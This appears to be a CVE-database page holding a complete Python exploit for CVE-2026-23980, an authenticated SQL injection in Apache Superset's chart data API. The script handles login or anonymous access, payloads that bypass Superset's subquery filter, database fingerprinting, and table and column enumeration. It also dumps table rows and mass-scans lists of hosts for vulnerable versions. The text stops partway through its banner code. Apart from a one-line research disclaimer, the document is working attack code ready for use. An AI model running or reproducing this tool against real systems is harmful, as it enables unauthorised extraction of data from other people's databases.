5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
#!/usr/bin/env python3
"""
CVE-2026-23980 -- Apache Superset Authenticated Error-Based SQL Injection
=========================================================================
Apache Superset < 6.0.0 allows authenticated users with read access to
perform error-based SQL injection via the 'sqlExpression' or 'where'
parameters in the /api/v1/chart/data endpoint.

Kill chain:
  POST /api/v1/chart/data
  -> ChartDataRestApi.data() -> QueryContext.get_df_payload()
  -> SqlaTable.get_sqla_query() -> adhoc column sqlExpression
  -> validate_adhoc_subquery() BYPASSED via query_to_xml()
  -> raw SQL hits the database -> data extraction

For AUTHORIZED SECURITY RESEARCH ONLY.
CVSS 6.5 | CWE-89 | Fixed in Apache Superset 6.0.0
"""

from __future__ import annotations

import argparse
import json
import sys
import textwrap
import time
import random
import re
import threading
from concurrent.futures import ThreadPoolExecutor, as_completed

try:
    import requests
    from requests.exceptions import ConnectionError, Timeout
except ImportError:
    print("[!] 'requests' library required: pip install requests")
    sys.exit(1)

# -- Globals -----------------------------------------------------------------

VERBOSITY = 1


# -- ANSI --------------------------------------------------------------------

class C:
    """ANSI SGR escape sequences used to colour and style terminal output.

    The attributes are plain strings meant to be interpolated into printed
    text; ``RESET`` must follow any styled span to restore the defaults.
    """
    # Bright foreground colours (SGR codes 90-97).
    RED     = "\033[91m"
    GREEN   = "\033[92m"
    YELLOW  = "\033[93m"
    CYAN    = "\033[96m"
    MAGENTA = "\033[95m"
    WHITE   = "\033[97m"
    GRAY    = "\033[90m"
    # Text attributes: bold (1), faint (2), blink (5).
    BOLD    = "\033[1m"
    DIM     = "\033[2m"
    BLINK   = "\033[5m"
    # SGR 0 clears every colour and attribute set above.
    RESET   = "\033[0m"


# -- Output helpers ----------------------------------------------------------

# Unicode block-element glyphs used for decorative "glitch" strings.
_glitch_chars = list("\u2591\u2592\u2593\u2588\u2580\u2584\u258c\u2590")
# Serialises console writes issued from worker threads.
_print_lock = threading.Lock()

def _glitch(n: int = 12) -> str:
    """Return a string of *n* glyphs drawn at random from ``_glitch_chars``."""
    picked = []
    for _ in range(n):
        picked.append(random.choice(_glitch_chars))
    return "".join(picked)

def _typewriter(text: str, speed: float = 0.02):
    """Print *text* one character at a time, then terminate the line.

    Each character is flushed immediately and followed by a pause of
    *speed* seconds, so the text appears to be typed out.
    """
    stream = sys.stdout
    for glyph in text:
        stream.write(glyph)
        stream.flush()  # make the character visible before pausing
        time.sleep(speed)
    print()

def info(msg):
    """Print an informational ``[*]`` line unless verbosity is below 1."""
    if VERBOSITY < 1:
        return
    line = f"  {C.CYAN}[*]{C.RESET} {msg}"
    print(line)

def good(msg):
    """Print a success ``[+]`` line; shown at every verbosity level."""
    line = f"  {C.GREEN}[+]{C.RESET} {msg}"
    print(line)

def warn(msg):
    """Print a warning ``[!]`` line; shown at every verbosity level."""
    line = f"  {C.YELLOW}[!]{C.RESET} {msg}"
    print(line)

def fail(msg):
    """Print a failure ``[-]`` line; shown at every verbosity level."""
    line = f"  {C.RED}{C.BOLD}[-]{C.RESET} {msg}"
    print(line)

def creepy(msg):
    """Print a magenta ``[~]`` flavour line unless verbosity is below 1."""
    if VERBOSITY < 1:
        return
    line = f"  {C.MAGENTA}[~]{C.RESET} {C.MAGENTA}{msg}{C.RESET}"
    print(line)

def debug(msg):
    """Print a dimmed ``[DEBUG]`` line when verbosity is 2 or higher."""
    if VERBOSITY < 2:
        return
    line = f"  {C.GRAY}[DEBUG]{C.RESET} {C.DIM}{msg}{C.RESET}"
    print(line)

def print_table(headers: list[str], rows: list[list[str]], title: str = ""):
    """Render *rows* beneath *headers* as a boxed ASCII table on stdout.

    Nothing is printed when *rows* is empty. Each column is as wide as its
    header or its longest cell, whichever is larger. Cells beyond the number
    of headers are ignored, and rows with fewer cells than headers are padded
    with blanks. An optional *title* is printed above the table, and a row
    count is printed below it.
    """
    if not rows:
        return

    # Start from the header widths and grow each column to fit its cells.
    widths = [len(h) for h in headers]
    for record in rows:
        for idx, cell in zip(range(len(widths)), record):
            widths[idx] = max(widths[idx], len(str(cell)))

    rule = "+-" + "-+-".join("-" * w for w in widths) + "-+"
    head_cells = [h.ljust(w) for h, w in zip(headers, widths)]
    header_line = "| " + " | ".join(head_cells) + " |"

    if title:
        print(f"\n  {C.WHITE}{C.BOLD}{title}{C.RESET}")
    print(f"  {rule}")
    print(f"  {C.BOLD}{header_line}{C.RESET}")
    print(f"  {rule}")
    for record in rows:
        # Missing trailing cells render as empty, padded to the column width.
        padded = [
            (str(record[idx]) if idx < len(record) else "").ljust(w)
            for idx, w in enumerate(widths)
        ]
        print(f"  | {' | '.join(padded)} |")
    print(f"  {rule}")
    print(f"  {C.DIM}[{len(rows)} row(s)]{C.RESET}")


# -- Session management ------------------------------------------------------

def login(base_url: str, username: str, password: str,
          timeout: int = 15) -> requests.Session | None:
    session = requests.Session()
    try:
        r = session.post(
            f"{base_url}/api/v1/security/login",
            json={"username": username, "password": password,
                  "provider": "db", "refresh": True},
            timeout=timeout,
        )
        if r.status_code != 200:
            fail(f"login failed: HTTP {r.status_code}")
            return None
        token = r.json().get("access_token")
        if not token:
            fail("no access_token in response")
            return None
        session.headers.update({"Authorization": f"Bearer {token}"})
    except Exception as e:
        fail(f"login error: {e}")
        return None

    try:
        r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
        if r.status_code == 200:
            csrf = r.json().get("result")
            if csrf:
                session.headers.update({"X-CSRFToken": csrf})
    except Exception:
        pass

    return session


def try_anonymous(base_url: str, timeout: int = 15) -> requests.Session | None:
    """Try to access Superset without authentication.

    Works when PUBLIC_ROLE_LIKE is set (e.g. "Gamma"), giving anonymous
    users read access to datasets and the chart/data endpoint.

    Also tries to grab a CSRF token from the login page cookies, which
    some Superset configs expose to anonymous users.
    """
    session = requests.Session()

    # Step 1: Hit the main page to pick up any session cookies
    try:
        r = session.get(base_url, timeout=timeout)
    except Exception:
        pass

    # Step 2: Try to get a CSRF token (some configs expose this anonymously)
    try:
        r = session.get(f"{base_url}/api/v1/security/csrf_token/", timeout=timeout)
        if r.status_code == 200:
            csrf = r.json().get("result")
            if csrf:
                session.headers.update({"X-CSRFToken": csrf})
                debug(f"got anonymous CSRF token")
    except Exception:
        pass

    # Step 3: Test if we can actually hit the chart/data endpoint
    # Try a minimal request to see if we get 401/403 or something else
    test_body = {
        "datasource": {"id": 1, "type": "table"},
        "queries": [{
            "columns": [{"label": "test", "sqlExpression": "1",
                         "expressionType": "SQL"}],
            "metrics": [], "filters": [],
            "extras": {"having": "", "where": ""},
            "row_limit": 1, "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }

    try:
        r = session.post(f"{base_url}/api/v1/chart/data",
                         json=test_body, timeout=timeout)
        if r.status_code in (200, 400, 422, 500):
            # Got past auth — public role is active
            return session
        elif r.status_code in (401, 403):
            return None
    except Exception:
        pass

    return None




def check_version(base_url: str, timeout: int = 10) -> str | None:
    for endpoint in ["/api/v1/version", "/health"]:
        try:
            r = requests.get(f"{base_url}{endpoint}", timeout=timeout)
            if r.status_code == 200:
                data = r.json()
                v = data.get("result", {}).get("version") or data.get("version")
                if v:
                    return v
        except Exception:
            pass
    return None


def is_vulnerable(version: str) -> bool:
    try:
        parts = [int(x) for x in version.strip().split(".")[:3]]
        return parts[0] < 6
    except ValueError:
        return False


def enumerate_datasources(base_url: str, session: requests.Session,
                          timeout: int = 15) -> list[dict]:
    datasources = []
    try:
        r = session.get(f"{base_url}/api/v1/dataset/",
                        params={"q": "(page_size:50)"}, timeout=timeout)
        if r.status_code == 200:
            for ds in r.json().get("result", []):
                datasources.append({
                    "id": ds.get("id"),
                    "name": ds.get("table_name") or ds.get("datasource_name"),
                    "schema": ds.get("schema"),
                    "database": ds.get("database", {}).get("database_name", "?"),
                    "type": ds.get("datasource_type", "table"),
                })
    except Exception:
        pass
    return datasources


# -- SQL Injection core -------------------------------------------------------

def build_chart_data_payload(datasource_id: int, datasource_type: str = "table",
                             injection_point: str = "sqlExpression",
                             sqli_payload: str = "1") -> dict:
    if injection_point == "sqlExpression":
        return {
            "datasource": {"id": datasource_id, "type": datasource_type},
            "queries": [{
                "columns": [{
                    "label": "injected",
                    "sqlExpression": sqli_payload,
                    "expressionType": "SQL",
                }],
                "metrics": [], "filters": [],
                "extras": {"having": "", "where": ""},
                "row_limit": 1000, "order_desc": True,
                "time_range": "No filter",
            }],
            "result_format": "json", "result_type": "full",
        }
    else:
        return {
            "datasource": {"id": datasource_id, "type": datasource_type},
            "queries": [{
                "columns": [],
                "metrics": [{"label": "cnt", "expressionType": "SQL",
                             "sqlExpression": "COUNT(*)"}],
                "filters": [],
                "extras": {"having": "", "where": sqli_payload},
                "row_limit": 1, "order_desc": True,
                "time_range": "No filter",
            }],
            "result_format": "json", "result_type": "full",
        }


def send_sqli(base_url: str, session: requests.Session, datasource_id: int,
              sqli_payload: str, injection_point: str = "sqlExpression",
              datasource_type: str = "table",
              timeout: int = 30) -> tuple[int, str]:
    body = build_chart_data_payload(datasource_id, datasource_type,
                                    injection_point, sqli_payload)
    debug(f"SQL payload: {sqli_payload}")
    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if VERBOSITY >= 3:
            debug(f"HTTP {r.status_code}: {r.text[:300]}")
        return r.status_code, r.text
    except Exception as e:
        return 0, str(e)


def extract_from_direct(response_text: str) -> list[dict] | None:
    """Parse all rows from a successful JSON response."""
    try:
        data = json.loads(response_text)
        results = data.get("result", [])
        if results and results[0].get("data"):
            return results[0]["data"]
    except Exception:
        pass
    return None


def extract_single_from_direct(response_text: str) -> str | None:
    """Extract a single value from direct response."""
    rows = extract_from_direct(response_text)
    if rows:
        row = rows[0]
        val = row.get("injected")
        if val is not None:
            return str(val)
    return None


def extract_from_error(response_text: str) -> str | None:
    patterns = [
        r'invalid input syntax for (?:type )?integer: "([^"]*)"',
        r'"message":\s*".*?invalid input syntax.*?\\"([^\\]*)\\"',
    ]
    for pat in patterns:
        m = re.search(pat, response_text)
        if m:
            return m.group(1)
    return None


def sqli_extract_string(sql_expr: str) -> str:
    return f"CAST(({sql_expr}) AS INT)"


def sqli_xml_bypass(sql_query: str) -> str:
    return f"query_to_xml('{sql_query}', true, false, '')"


def extract_value(base_url, session, ds_id, sql, inj_point="sqlExpression",
                  xml_bypass=False, timeout=30) -> str | None:
    """Extract a single value. Tries direct, then error-based."""
    # Direct
    if inj_point == "sqlExpression":
        status, text = send_sqli(base_url, session, ds_id, f"({sql})",
                                 injection_point=inj_point, timeout=timeout)
        result = extract_single_from_direct(text)
        if result:
            return result

    # Error-based
    if xml_bypass:
        inner = sqli_xml_bypass(sql.replace("'", "''"))
        payload = f"CAST(({inner})::text AS INT)"
    else:
        payload = sqli_extract_string(sql)

    if inj_point == "where":
        payload = f"1=1 AND {payload} > 0"

    status, text = send_sqli(base_url, session, ds_id, payload,
                             injection_point=inj_point, timeout=timeout)
    return extract_from_error(text)


def extract_rows(base_url, session, ds_id, sql, inj_point="sqlExpression",
                 xml_bypass=False, timeout=30,
                 start=0, stop=100) -> list[str]:
    """Extract multiple rows using LIMIT/OFFSET."""
    results = []
    base_sql = re.sub(r'\s+LIMIT\s+\d+', '', sql, flags=re.I)
    base_sql = re.sub(r'\s+OFFSET\s+\d+', '', base_sql, flags=re.I)

    for offset in range(start, stop):
        query = f"{base_sql} LIMIT 1 OFFSET {offset}"
        val = extract_value(base_url, session, ds_id, query,
                            inj_point=inj_point, xml_bypass=xml_bypass,
                            timeout=timeout)
        if val is None:
            break
        results.append(val)
        if VERBOSITY >= 1:
            sys.stdout.write(f"\r  {C.CYAN}[*]{C.RESET} extracting... "
                             f"{C.BOLD}{len(results)}{C.RESET} row(s)")
            sys.stdout.flush()
    if results and VERBOSITY >= 1:
        print()
    return results


def extract_multi_column_direct(base_url, session, ds_id, columns: list[str],
                                inj_point="sqlExpression", timeout=30,
                                start=0, stop=20) -> list[list[str]]:
    """Extract multi-column data using direct sqlExpression reads.

    Instead of SELECT col FROM table (blocked by subquery filter),
    we inject the column name directly as the sqlExpression. This reads
    from the datasource's underlying table without a FROM clause.
    We use row_limit and offset via multiple requests.
    """
    # Build payload with all columns at once
    body = {
        "datasource": {"id": ds_id, "type": "table"},
        "queries": [{
            "columns": [
                {"label": col, "sqlExpression": col, "expressionType": "SQL"}
                for col in columns
            ],
            "metrics": [], "filters": [],
            "extras": {"having": "", "where": ""},
            "row_limit": stop - start,
            "row_offset": start,
            "order_desc": False,
            "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }

    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if r.status_code == 200:
            data = r.json().get("result", [{}])[0].get("data", [])
            rows = []
            for row in data:
                rows.append([str(row.get(col, "NULL")) for col in columns])
            return rows
    except Exception:
        pass
    return []


def extract_multi_column_rows(base_url, session, ds_id, columns: list[str],
                              table: str, inj_point="sqlExpression",
                              xml_bypass=False, timeout=30,
                              start=0, stop=20, where="") -> list[list[str]]:
    """Extract multiple columns per row. Tries direct read first, then subquery."""

    # Strategy 1: Direct column read (works when ds_id matches the table)
    if inj_point == "sqlExpression" and not xml_bypass:
        rows = extract_multi_column_direct(base_url, session, ds_id, columns,
                                           inj_point=inj_point, timeout=timeout,
                                           start=start, stop=stop)
        if rows:
            if VERBOSITY >= 1:
                print(f"  {C.CYAN}[*]{C.RESET} extracted {C.BOLD}{len(rows)}{C.RESET} row(s) via direct read")
            return rows

    # Strategy 2: Subquery per column (works with xml_bypass on PostgreSQL)
    rows = []
    where_clause = f" WHERE {where}" if where else ""

    for offset in range(start, stop):
        row_data = []
        empty = True
        for col in columns:
            sql = f"SELECT {col} FROM {table}{where_clause} LIMIT 1 OFFSET {offset}"
            val = extract_value(base_url, session, ds_id, sql,
                                inj_point=inj_point, xml_bypass=xml_bypass,
                                timeout=timeout)
            if val is not None:
                empty = False
            row_data.append(val or "NULL")
        if empty:
            break
        rows.append(row_data)
        if VERBOSITY >= 1:
            sys.stdout.write(f"\r  {C.CYAN}[*]{C.RESET} dumping... "
                             f"{C.BOLD}{len(rows)}{C.RESET} row(s)")
            sys.stdout.flush()
    if rows and VERBOSITY >= 1:
        print()
    return rows


# -- DB Fingerprinting -------------------------------------------------------

def fingerprint_db(base_url, session, ds_id, inj_point="sqlExpression",
                   timeout=30) -> str:
    """Detect backend database type. Returns 'sqlite', 'postgresql', or 'unknown'."""
    info("fingerprinting backend database...")

    # Try SQLite — sqlite_version() is a scalar function (no FROM)
    status, text = send_sqli(base_url, session, ds_id, "(SELECT sqlite_version())",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val and re.match(r'\d+\.\d+', val):
        good(f"backend: {C.BOLD}SQLite {val}{C.RESET}")
        return "sqlite"

    # Try PostgreSQL — current_setting() is a scalar function (no FROM)
    status, text = send_sqli(base_url, session, ds_id,
                             "(SELECT current_setting('server_version'))",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val and re.match(r'\d+\.\d+', val):
        good(f"backend: {C.BOLD}PostgreSQL {val}{C.RESET}")
        return "postgresql"

    # Try MySQL — @@version is a system variable (no FROM)
    status, text = send_sqli(base_url, session, ds_id, "(SELECT @@version)",
                             injection_point=inj_point, timeout=timeout)
    val = extract_single_from_direct(text)
    if val:
        good(f"backend: {C.BOLD}MySQL {val}{C.RESET}")
        return "mysql"

    warn("could not fingerprint backend database")
    return "unknown"


# -- Enumeration functions (sqlmap-style) ------------------------------------

def enum_banner(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching banner...")
    queries = {
        "sqlite": "SELECT sqlite_version()",
        "postgresql": "SELECT current_setting('server_version')",
        "mysql": "SELECT @@version",
        "unknown": "SELECT sqlite_version()",
    }
    val = extract_value(base_url, session, ds_id, queries.get(db_type, queries["unknown"]),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"banner: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch banner")


def enum_current_user(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching current user...")
    queries = {
        "sqlite": "SELECT 'sqlite_user'",
        "postgresql": "SELECT current_user",
        "mysql": "SELECT user()",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT current_user"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"current user: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch current user")


def enum_current_db(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching current database...")
    queries = {
        "sqlite": "SELECT 'main'",
        "postgresql": "SELECT current_database()",
        "mysql": "SELECT database()",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT current_database()"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"current database: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch current database")


def enum_hostname(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("fetching hostname...")
    queries = {
        "sqlite": "SELECT 'N/A (SQLite)'",
        "postgresql": "SELECT inet_server_addr()",
        "mysql": "SELECT @@hostname",
    }
    val = extract_value(base_url, session, ds_id,
                        queries.get(db_type, "SELECT 'unknown'"),
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if val:
        good(f"hostname: {C.BOLD}{val}{C.RESET}")
    else:
        fail("could not fetch hostname")


def enum_dbs(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout):
    info("enumerating databases...")
    queries = {
        "sqlite": "SELECT name FROM pragma_database_list",
        "postgresql": "SELECT datname FROM pg_database WHERE datistemplate = false",
        "mysql": "SELECT schema_name FROM information_schema.schemata",
    }
    sql = queries.get(db_type, queries["postgresql"])
    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"available databases [{len(rows)}]:")
        print_table(["database"], [[r] for r in rows])
    else:
        # Fallback: list databases from Superset API
        warn("subquery blocked -- listing databases from Superset API")
        try:
            r = session.get(f"{base_url.rstrip('/')}/api/v1/database/", timeout=timeout)
            if r.status_code == 200:
                dbs = r.json().get("result", [])
                if dbs:
                    db_names = [d.get("database_name", "?") for d in dbs]
                    good(f"available databases [{len(db_names)}] (via API):")
                    print_table(["database"], [[n] for n in db_names])
                    return
        except Exception:
            pass
        fail("could not enumerate databases")


def enum_tables(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                target_db=None, datasources=None):
    db_label = target_db or "current"
    info(f"enumerating tables in '{db_label}'...")

    if db_type == "sqlite":
        sql = "SELECT name FROM sqlite_master WHERE type='table'"
    elif db_type == "postgresql":
        schema = target_db or "public"
        sql = (f"SELECT table_name FROM information_schema.tables "
               f"WHERE table_schema='{schema}'")
    elif db_type == "mysql":
        if target_db:
            sql = (f"SELECT table_name FROM information_schema.tables "
                   f"WHERE table_schema='{target_db}'")
        else:
            sql = ("SELECT table_name FROM information_schema.tables "
                   "WHERE table_schema=database()")
    else:
        sql = "SELECT name FROM sqlite_master WHERE type='table'"

    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"tables in '{db_label}' [{len(rows)}]:")
        print_table(["table_name"], [[r] for r in rows])
    else:
        # Fallback: if subquery blocked, list known datasources as tables
        if datasources:
            warn("subquery filter blocked FROM clause -- listing known datasources instead")
            warn("use --xml-bypass on PostgreSQL to bypass this filter")
            rows = [ds["name"] for ds in datasources if ds["name"]]
            if rows:
                good(f"known datasource tables [{len(rows)}]:")
                print_table(["table_name"], [[r] for r in rows])
        else:
            fail("could not enumerate tables (subquery filter active)")
            warn("try --xml-bypass on PostgreSQL targets")
    return rows


def enum_columns_via_api(base_url, session, target_table, datasources, timeout=15):
    """Fallback: get columns from the Superset dataset API."""
    # Find the dataset ID for this table
    ds_match = None
    for ds in (datasources or []):
        if ds.get("name") == target_table:
            ds_match = ds
            break
    if not ds_match:
        return []

    try:
        r = session.get(f"{base_url}/api/v1/dataset/{ds_match['id']}",
                        timeout=timeout)
        if r.status_code == 200:
            cols = r.json().get("result", {}).get("columns", [])
            return [c.get("column_name") or c.get("name", "?") for c in cols]
    except Exception:
        pass
    return []


def enum_columns(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                 target_table, target_db=None, datasources=None):
    info(f"enumerating columns in '{target_table}'...")

    if db_type == "sqlite":
        sql = f"SELECT name FROM pragma_table_info('{target_table}')"
    elif db_type == "postgresql":
        schema = target_db or "public"
        sql = (f"SELECT column_name FROM information_schema.columns "
               f"WHERE table_schema='{schema}' AND table_name='{target_table}'")
    elif db_type == "mysql":
        if target_db:
            sql = (f"SELECT column_name FROM information_schema.columns "
                   f"WHERE table_schema='{target_db}' AND table_name='{target_table}'")
        else:
            sql = (f"SELECT column_name FROM information_schema.columns "
                   f"WHERE table_schema=database() AND table_name='{target_table}'")
    else:
        sql = f"SELECT name FROM pragma_table_info('{target_table}')"

    rows = extract_rows(base_url, session, ds_id, sql,
                        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout)
    if rows:
        good(f"columns in '{target_table}' [{len(rows)}]:")
        print_table(["column_name"], [[r] for r in rows])
    else:
        # Fallback: get columns from Superset API
        warn("subquery blocked -- falling back to Superset dataset API")
        api_cols = enum_columns_via_api(base_url, session, target_table,
                                         datasources, timeout)
        if api_cols:
            rows = api_cols
            good(f"columns in '{target_table}' [{len(rows)}] (via API):")
            print_table(["column_name"], [[r] for r in rows])
        else:
            fail(f"could not enumerate columns for '{target_table}'")
    return rows


def enum_count(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
               target_table, target_db=None):
    info(f"counting rows in '{target_table}'...")
    # COUNT(*) must be sent as a metric, not a column
    body = {
        "datasource": {"id": ds_id, "type": "table"},
        "queries": [{
            "columns": [],
            "metrics": [{"label": "cnt", "expressionType": "SQL",
                         "sqlExpression": "COUNT(*)"}],
            "filters": [], "extras": {"having": "", "where": ""},
            "row_limit": 1, "time_range": "No filter",
        }],
        "result_format": "json", "result_type": "full",
    }
    try:
        r = session.post(f"{base_url}/api/v1/chart/data", json=body, timeout=timeout)
        if r.status_code == 200:
            data = r.json().get("result", [{}])[0].get("data", [])
            if data:
                cnt = data[0].get("cnt")
                if cnt is not None:
                    good(f"rows in '{target_table}': {C.BOLD}{cnt}{C.RESET}")
                    return
    except Exception:
        pass
    fail("could not count rows")


def enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
              target_table, target_columns=None, target_db=None,
              start=0, stop=20, datasources=None):
    if target_columns:
        columns = [c.strip() for c in target_columns.split(",")]
    else:
        # Auto-discover columns
        cols = enum_columns(base_url, session, ds_id, db_type, inj_point,
                            xml_bypass, timeout, target_table, target_db,
                            datasources=datasources)
        if not cols:
            fail("cannot dump without column names -- specify -C manually")
            return
        columns = cols[:10]

    info(f"dumping '{target_table}' [{', '.join(columns)}] rows {start}-{stop}...")

    rows = extract_multi_column_rows(
        base_url, session, ds_id, columns, target_table,
        inj_point=inj_point, xml_bypass=xml_bypass, timeout=timeout,
        start=start, stop=stop,
    )

    if rows:
        good(f"dumped {len(rows)} row(s) from '{target_table}':")
        print_table(columns, rows, title=f"Table: {target_table}")
    else:
        fail(f"could not dump '{target_table}'")


def enum_dump_all(base_url, session, ds_id, db_type, inj_point, xml_bypass, timeout,
                  target_db=None, start=0, stop=10, datasources=None):
    tables = enum_tables(base_url, session, ds_id, db_type, inj_point,
                         xml_bypass, timeout, target_db, datasources=datasources)
    if not tables:
        return

    for table_name in tables:
        print()
        enum_dump(base_url, session, ds_id, db_type, inj_point, xml_bypass,
                  timeout, table_name, target_db=target_db,
                  start=start, stop=stop, datasources=datasources)


# -- Injection test ----------------------------------------------------------

def test_injectable(base_url, session, ds_id, timeout=30) -> str | None:
    for point in ("sqlExpression", "where"):
        if point == "sqlExpression":
            payload = "CAST('sqli_test_xyzzy' AS INT)"
        else:
            payload = "1=1 AND CAST('sqli_test_xyzzy' AS INT) > 0"
        status, text = send_sqli(base_url, session, ds_id, payload,
                                 injection_point=point, timeout=timeout)
        if "sqli_test_xyzzy" in text:
            return point
    return None


# -- Bulk scanner ------------------------------------------------------------

def _scan_single(target, timeout, results):
    target = target.strip().rstrip("/")
    if not target:
        return
    if not target.startswith("http"):
        target = f"http://{target}"

    entry = {"url": target, "status": "unknown", "version": None}
    try:
        version = check_version(target, timeout=timeout)
        if version:
            entry["version"] = version
            entry["status"] = "VULNERABLE" if is_vulnerable(version) else "patched"
        else:
            try:
                r = requests.get(target, timeout=timeout)
                entry["status"] = "up (version hidden)" if r.status_code < 500 else "error"
            except Exception:
                entry["status"] = "down"

        with _print_lock:
            if entry["status"] == "VULNERABLE":
                print(f"  {C.RED}[VULN]{C.RESET} {C.BOLD}{target}{C.RESET} -- {entry['version']}")
            elif entry["status"] == "patched":
                print(f"  {C.GREEN}[SAFE]{C.RESET} {target} -- {entry['version']}")
            else:
                print(f"  {C.GRAY}[----]{C.RESET} {target} -- {C.DIM}{entry['status']}{C.RESET}")
    except Exception:
        entry["status"] = "error"
    results[target] = entry


def run_bulk_scan(scan_file, threads=10, timeout=10, output_file=None):
    """Version-check every target listed in ``scan_file`` using a thread pool.

    Blank lines and lines starting with ``#`` are ignored. Each remaining
    line is handed to ``_scan_single``; afterwards a summary with the number
    of ``VULNERABLE`` entries is printed and, when ``output_file`` is given,
    one tab-separated line per result (status, url, version) is written.

    Args:
        scan_file: Path of the text file holding one target per line.
        threads: Number of worker threads; values below 1 are treated as 1.
        timeout: Timeout forwarded to ``_scan_single``.
        output_file: Optional path for the tab-separated results.

    Exits the process with status 1 when ``scan_file`` cannot be read.
    """
    try:
        # Explicit encoding keeps behavior independent of the locale;
        # undecodable bytes are replaced rather than aborting the scan.
        with open(scan_file, encoding="utf-8", errors="replace") as fh:
            targets = [
                line.strip() for line in fh
                if line.strip() and not line.strip().startswith("#")
            ]
    except FileNotFoundError:
        fail(f"file not found: {scan_file}")
        sys.exit(1)
    except OSError as err:
        # Permission problems, directories, etc. were previously a traceback.
        fail(f"cannot read {scan_file}: {err}")
        sys.exit(1)

    print(f"\n  {C.RED}{C.BOLD}CVE-2026-23980{C.RESET} -- {C.DIM}Bulk Scanner{C.RESET}")
    info(f"loaded {len(targets)} target(s)")
    print(f"  {C.DIM}{'=' * 50}{C.RESET}")

    results = {}
    start = time.time()
    # ThreadPoolExecutor rejects max_workers <= 0, so clamp user input.
    with ThreadPoolExecutor(max_workers=max(1, threads)) as pool:
        futures = {pool.submit(_scan_single, t, timeout, results): t for t in targets}
        for fut in as_completed(futures):
            # _scan_single handles its own errors; report anything that
            # still escapes instead of discarding it silently.
            err = fut.exception()
            if err is not None:
                fail(f"scan of {futures[fut]} failed: {err}")

    elapsed = time.time() - start
    vuln = sum(1 for r in results.values() if r["status"] == "VULNERABLE")
    print(f"  {C.DIM}{'=' * 50}{C.RESET}")
    print(f"  {C.RED}{C.BOLD}{vuln}{C.RESET} vulnerable / {len(results)} scanned ({elapsed:.1f}s)\n")

    if output_file:
        try:
            with open(output_file, "w", encoding="utf-8") as out:
                out.writelines(
                    f"{r['status']}\t{r['url']}\tv={r['version'] or '?'}\n"
                    for r in results.values()
                )
        except OSError as err:
            fail(f"cannot write {output_file}: {err}")
        else:
            good(f"saved to {output_file}")


# -- Banner ------------------------------------------------------------------

# ASCII-art skull shown by banner(), one string per output row. The rows
# embed raw ANSI escape sequences (\033[...m) for coloring, so they are
# printed as-is rather than composed from the C color constants.
_BLOODY_SKULL = [
    "             \033[91m\033[1m_,.-------.,_\033[0m",
    "         \033[91m\033[1m,;~'\033[0m\033[31m             \033[91m\033[1m'~;,\033[0m",
    "       \033[91m\033[1m,;\033[0m\033[31m                   \033[91m\033[1m;,\033[0m",
    "      \033[91m\033[1m;\033[0m\033[31m    \033[91m\033[1m_    ___    _\033[0m\033[31m    \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m'\033[0m\033[31m   \033[97m\033[1m/  \\ \033[0m\033[31m   \033[97m\033[1m/  \\ \033[0m\033[31m   \033[91m\033[1m'\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m  \033[97m\033[1m| () |\033[0m\033[31m \033[97m\033[1m| () |\033[0m\033[31m  \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m   \033[97m\033[1m\\__/ \033[0m\033[31m   \033[97m\033[1m\\__/ \033[0m\033[31m   \033[91m\033[1m;\033[0m",
    "     \033[91m\033[1m;\033[0m\033[31m         \033[91m\033[1m/\\\033[0m\033[31m         \033[91m\033[1m;\033[0m",
    "      \033[91m\033[1m;\033[0m\033[31m    \033[91m\033[1m\\______/\033[0m\033[31m    \033[91m\033[1m;\033[0m",
    "       \033[91m\033[1m';\033[0m\033[31m  \033[91m\033[1m|\"\"\"\"\"\"|\033[0m\033[31m  \033[91m\033[1m;'\033[0m",
    "         \033[91m\033[1m';\033[0m\033[31m \033[91m\033[1m|      |\033[0m\033[31m \033[91m\033[1m;'\033[0m",
    "           \033[91m\033[1m'------'\033[0m",
]

def banner():
    """Print the startup banner: skull art, boxed title, and a typed tagline.

    The skull rows are printed with a 0.04 s pause after each one; the
    tagline is emitted through ``_typewriter``.
    """
    print()
    for row in _BLOODY_SKULL:
        print(f"  {row}")
        time.sleep(0.04)

    accent = f"{C.RED}{C.BOLD}"
    rule = "=" * 59
    # The box is emitted with a single print call, first row being the bare
    # color prefix, so the rows are joined with newlines.
    box_rows = (
        accent,
        f"  \u2554{rule}\u2557",
